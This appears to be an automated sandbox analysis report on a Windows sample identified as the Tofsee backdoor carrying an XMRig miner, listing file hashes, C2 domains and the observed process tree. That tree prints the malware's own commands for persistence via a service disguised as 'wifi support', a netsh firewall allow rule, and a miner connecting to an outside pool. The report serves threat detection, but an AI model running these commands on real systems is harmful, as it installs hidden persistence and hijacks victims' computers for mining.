Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-02-2023 01:17

General

  • Target

    file.exe

  • Size

    299KB

  • MD5

    1c5c5fcbb9411738d3e6945a538522c9

  • SHA1

    e9f3e00bb4f5a3035481d05d7429c825bd16ab7b

  • SHA256

    8009c5bc8df7fb418791fe8ec56e58ee257ef1dcddbe47a8dfe180b6fee3b390

  • SHA512

    e580b9531d14e3fe0264559d70f43b7d8a8a77ab32b52d3d5e919b96871af264b4886e55752e9feefa352746846ea1310cb5ef49cd3a81643b822e8d70878947

  • SSDEEP

    3072:3zb6bLKLLCeRmSULtjK0h13Di9+6QtXxp+q0rsL4spqIuQjiMTE5JOPa5H:j0KLLCdSuR1zis6QtXxYTN+qIuQj9ja

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bydydurv\
      2⤵
        PID:1804
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yffjkuep.exe" C:\Windows\SysWOW64\bydydurv\
        2⤵
          PID:2368
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create bydydurv binPath= "C:\Windows\SysWOW64\bydydurv\yffjkuep.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:2216
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description bydydurv "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1876
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start bydydurv
          2⤵
          • Launches sc.exe
          PID:4308
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1912
      • C:\Windows\SysWOW64\bydydurv\yffjkuep.exe
        C:\Windows\SysWOW64\bydydurv\yffjkuep.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3868
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4080
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2208

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\yffjkuep.exe
        Filesize

        14.3MB

        MD5

        4852439214c67efbbdfe634ec33f6f8c

        SHA1

        e4c47700682f34c2315026690e918e8c1509ac48

        SHA256

        18b5b90e13d73fbbeef32974ab6bdd7950fb2d4fb8787daf7496fe3256ef1aff

        SHA512

        72599bdf8ee6cd6dd9da1d4ee36bca7c6654bee1739cab3f3967306dd5dd9db77ad4cff567743fdee292afdc1cf9b6a3a2b275e0518b8b26cd35fd5c879af5ab

      • C:\Windows\SysWOW64\bydydurv\yffjkuep.exe
        Filesize

        14.3MB

        MD5

        4852439214c67efbbdfe634ec33f6f8c

        SHA1

        e4c47700682f34c2315026690e918e8c1509ac48

        SHA256

        18b5b90e13d73fbbeef32974ab6bdd7950fb2d4fb8787daf7496fe3256ef1aff

        SHA512

        72599bdf8ee6cd6dd9da1d4ee36bca7c6654bee1739cab3f3967306dd5dd9db77ad4cff567743fdee292afdc1cf9b6a3a2b275e0518b8b26cd35fd5c879af5ab

      • memory/1800-142-0x00000000007EF000-0x0000000000804000-memory.dmp
        Filesize

        84KB

      • memory/1800-133-0x0000000000760000-0x0000000000773000-memory.dmp
        Filesize

        76KB

      • memory/1800-134-0x0000000000400000-0x00000000004C7000-memory.dmp
        Filesize

        796KB

      • memory/1800-132-0x00000000007EF000-0x0000000000804000-memory.dmp
        Filesize

        84KB

      • memory/1800-143-0x0000000000400000-0x00000000004C7000-memory.dmp
        Filesize

        796KB

      • memory/1804-135-0x0000000000000000-mapping.dmp
      • memory/1876-139-0x0000000000000000-mapping.dmp
      • memory/1912-141-0x0000000000000000-mapping.dmp
      • memory/2208-177-0x0000000000A20000-0x0000000000B11000-memory.dmp
        Filesize

        964KB

      • memory/2208-172-0x0000000000A20000-0x0000000000B11000-memory.dmp
        Filesize

        964KB

      • memory/2208-171-0x0000000000000000-mapping.dmp
      • memory/2216-138-0x0000000000000000-mapping.dmp
      • memory/2368-136-0x0000000000000000-mapping.dmp
      • memory/3868-147-0x00000000005E9000-0x00000000005FF000-memory.dmp
        Filesize

        88KB

      • memory/3868-149-0x0000000000400000-0x00000000004C7000-memory.dmp
        Filesize

        796KB

      • memory/4080-146-0x0000000000F10000-0x0000000000F25000-memory.dmp
        Filesize

        84KB

      • memory/4080-152-0x0000000000F10000-0x0000000000F25000-memory.dmp
        Filesize

        84KB

      • memory/4080-153-0x0000000002E00000-0x000000000300F000-memory.dmp
        Filesize

        2.1MB

      • memory/4080-156-0x0000000002580000-0x0000000002586000-memory.dmp
        Filesize

        24KB

      • memory/4080-159-0x0000000002590000-0x00000000025A0000-memory.dmp
        Filesize

        64KB

      • memory/4080-162-0x00000000031D0000-0x00000000031D5000-memory.dmp
        Filesize

        20KB

      • memory/4080-165-0x0000000007D00000-0x000000000810B000-memory.dmp
        Filesize

        4.0MB

      • memory/4080-168-0x00000000031E0000-0x00000000031E7000-memory.dmp
        Filesize

        28KB

      • memory/4080-151-0x0000000000F10000-0x0000000000F25000-memory.dmp
        Filesize

        84KB

      • memory/4080-145-0x0000000000000000-mapping.dmp
      • memory/4308-140-0x0000000000000000-mapping.dmp